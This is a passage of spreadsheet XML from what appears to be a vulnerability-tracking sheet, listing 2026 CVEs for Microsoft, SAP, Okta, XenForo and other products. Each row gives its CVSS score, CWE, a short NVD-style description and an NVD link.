      <c r="R692" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S692" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83982</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B693" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83983</t>
        </is>
      </c>
      <c r="D693" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E693" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F693" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G693" s="5" t="inlineStr"/>
      <c r="H693" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I693" s="5" t="inlineStr"/>
      <c r="J693" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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3" s="5" t="inlineStr"/>
      <c r="M693" s="5" t="inlineStr"/>
      <c r="N693" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O693" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P693" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q693" s="5" t="inlineStr"/>
      <c r="R693" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S693" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83983</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B694" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83985</t>
        </is>
      </c>
      <c r="D694" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E694" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F694" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G694" s="5" t="inlineStr"/>
      <c r="H694" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I694" s="5" t="inlineStr"/>
      <c r="J694" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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4" s="5" t="inlineStr"/>
      <c r="M694" s="5" t="inlineStr"/>
      <c r="N694" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O694" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P694" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q694" s="5" t="inlineStr"/>
      <c r="R694" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S694" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83985</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B695" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83986</t>
        </is>
      </c>
      <c r="D695" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E695" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F695" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G695" s="5" t="inlineStr"/>
      <c r="H695" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I695" s="5" t="inlineStr"/>
      <c r="J695" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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5" s="5" t="inlineStr"/>
      <c r="M695" s="5" t="inlineStr"/>
      <c r="N695" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O695" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P695" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q695" s="5" t="inlineStr"/>
      <c r="R695" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S695" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83986</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B696" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83987</t>
        </is>
      </c>
      <c r="D696" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E696" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F696" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G696" s="5" t="inlineStr"/>
      <c r="H696" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I696" s="5" t="inlineStr"/>
      <c r="J696" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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6" s="5" t="inlineStr"/>
      <c r="M696" s="5" t="inlineStr"/>
      <c r="N696" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O696" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P696" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q696" s="5" t="inlineStr"/>
      <c r="R696" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S696" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83987</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B697" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83988</t>
        </is>
      </c>
      <c r="D697" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E697" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F697" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G697" s="5" t="inlineStr"/>
      <c r="H697" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I697" s="5" t="inlineStr"/>
      <c r="J697" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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7" s="5" t="inlineStr"/>
      <c r="M697" s="5" t="inlineStr"/>
      <c r="N697" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O697" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P697" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q697" s="5" t="inlineStr"/>
      <c r="R697" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S697" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B698" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83990</t>
        </is>
      </c>
      <c r="D698" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E698" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F698" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G698" s="5" t="inlineStr"/>
      <c r="H698" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I698" s="5" t="inlineStr"/>
      <c r="J698" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K698" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L698" s="5" t="inlineStr"/>
      <c r="M698" s="5" t="inlineStr"/>
      <c r="N698" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O698" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P698" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q698" s="5" t="inlineStr"/>
      <c r="R698" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S698" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B699" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83995</t>
        </is>
      </c>
      <c r="D699" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E699" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F699" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G699" s="5" t="inlineStr"/>
      <c r="H699" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I699" s="5" t="inlineStr"/>
      <c r="J699" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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9" s="5" t="inlineStr"/>
      <c r="M699" s="5" t="inlineStr"/>
      <c r="N699" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O699" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P699" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q699" s="5" t="inlineStr"/>
      <c r="R699" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S699" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83995</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B700" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84000</t>
        </is>
      </c>
      <c r="D700" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E700" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F700" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G700" s="5" t="inlineStr"/>
      <c r="H700" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I700" s="5" t="inlineStr"/>
      <c r="J700" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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00" s="5" t="inlineStr"/>
      <c r="M700" s="5" t="inlineStr"/>
      <c r="N700" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O700" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P700" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q700" s="5" t="inlineStr"/>
      <c r="R700" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S700" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B701" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85983</t>
        </is>
      </c>
      <c r="D701" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E701" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F701" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G701" s="5" t="inlineStr"/>
      <c r="H701" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I701" s="5" t="inlineStr"/>
      <c r="J701" s="5" t="inlineStr"/>
      <c r="K701" s="5" t="inlineStr"/>
      <c r="L701" s="5" t="inlineStr"/>
      <c r="M701" s="5" t="inlineStr"/>
      <c r="N701" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O701" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P701" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q701" s="5" t="inlineStr"/>
      <c r="R701" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S701"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T701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85983</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B702" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9034</t>
        </is>
      </c>
      <c r="D702" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E702" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F702" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G702" s="5" t="inlineStr"/>
      <c r="H702" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I702" s="5" t="inlineStr"/>
      <c r="J702" s="5" t="inlineStr"/>
      <c r="K702" s="5" t="inlineStr"/>
      <c r="L702" s="5" t="inlineStr"/>
      <c r="M702" s="5" t="inlineStr"/>
      <c r="N702" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O702" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P702" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q702" s="5" t="inlineStr"/>
      <c r="R702" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S702"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T702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9034</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B703" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19397</t>
        </is>
      </c>
      <c r="D703" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E703" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F703" s="5" t="inlineStr">
        <is>
          <t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t>
        </is>
      </c>
      <c r="G703" s="5" t="inlineStr"/>
      <c r="H703" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I703" s="5" t="inlineStr"/>
      <c r="J703" s="5" t="inlineStr"/>
      <c r="K703" s="5" t="inlineStr"/>
      <c r="L703" s="5" t="inlineStr"/>
      <c r="M703" s="5" t="inlineStr"/>
      <c r="N703" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O703" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P703" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q703" s="5" t="inlineStr"/>
      <c r="R703" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S703" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19397</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B704" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66767</t>
        </is>
      </c>
      <c r="D704" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E704" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F704" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G704" s="5" t="inlineStr"/>
      <c r="H704" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I704" s="5" t="inlineStr"/>
      <c r="J704" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K704" s="5" t="inlineStr"/>
      <c r="L704" s="5" t="inlineStr"/>
      <c r="M704" s="5" t="inlineStr"/>
      <c r="N704" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O704" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P704" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q704" s="5" t="inlineStr"/>
      <c r="R704" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S704"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T704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66767</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B705" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69683</t>
        </is>
      </c>
      <c r="D705" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E705" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F705" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G705" s="5" t="inlineStr"/>
      <c r="H705" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I705" s="5" t="inlineStr"/>
      <c r="J705" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K705" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L705" s="5" t="inlineStr"/>
      <c r="M705" s="5" t="inlineStr"/>
      <c r="N705" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O705" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P705" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q705" s="5" t="inlineStr"/>
      <c r="R705" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S705" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69683</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B706" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73315</t>
        </is>
      </c>
      <c r="D706" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E706" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F706" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G706" s="5" t="inlineStr"/>
      <c r="H706" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I706" s="5" t="inlineStr"/>
      <c r="J706" s="5" t="inlineStr"/>
      <c r="K706" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L706" s="5" t="inlineStr"/>
      <c r="M706" s="5" t="inlineStr"/>
      <c r="N706" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O706" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P706" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q706" s="5" t="inlineStr"/>
      <c r="R706" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S706"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T706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73315</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B707" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77909</t>
        </is>
      </c>
      <c r="D707" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E707" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F707" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G707" s="5" t="inlineStr"/>
      <c r="H707" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I707" s="5" t="inlineStr"/>
      <c r="J707" s="5" t="inlineStr"/>
      <c r="K707" s="5" t="inlineStr"/>
      <c r="L707" s="5" t="inlineStr"/>
      <c r="M707" s="5" t="inlineStr"/>
      <c r="N707" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O707" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P707" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q707" s="5" t="inlineStr"/>
      <c r="R707" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S707" s="5" t="inlineStr">
        <is>
          <t>Insufficiently protected credentials in Azure CycleCloud allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77909</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B708" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78623</t>
        </is>
      </c>
      <c r="D708" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E708" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F708" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G708" s="5" t="inlineStr"/>
      <c r="H708" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I708" s="5" t="inlineStr"/>
      <c r="J708" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K708" s="5" t="inlineStr"/>
      <c r="L708" s="5" t="inlineStr"/>
      <c r="M708" s="5" t="inlineStr"/>
      <c r="N708" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O708" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P708" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q708" s="5" t="inlineStr"/>
      <c r="R708" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S708"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T708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78623</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B709" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82537</t>
        </is>
      </c>
      <c r="D709" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E709" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F709" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G709" s="5" t="inlineStr"/>
      <c r="H709" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I709" s="5" t="inlineStr"/>
      <c r="J709" s="5" t="inlineStr"/>
      <c r="K709" s="5" t="inlineStr"/>
      <c r="L709" s="5" t="inlineStr"/>
      <c r="M709" s="5" t="inlineStr"/>
      <c r="N709" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O709" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P709" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q709" s="5" t="inlineStr"/>
      <c r="R709" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="S709"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T709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82537</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B710" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9040</t>
        </is>
      </c>
      <c r="D710" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E710" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F710" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G710" s="5" t="inlineStr"/>
      <c r="H710" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I710" s="5" t="inlineStr"/>
      <c r="J710" s="5" t="inlineStr"/>
      <c r="K710" s="5" t="inlineStr"/>
      <c r="L710" s="5" t="inlineStr"/>
      <c r="M710" s="5" t="inlineStr"/>
      <c r="N710" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O710" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P710" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
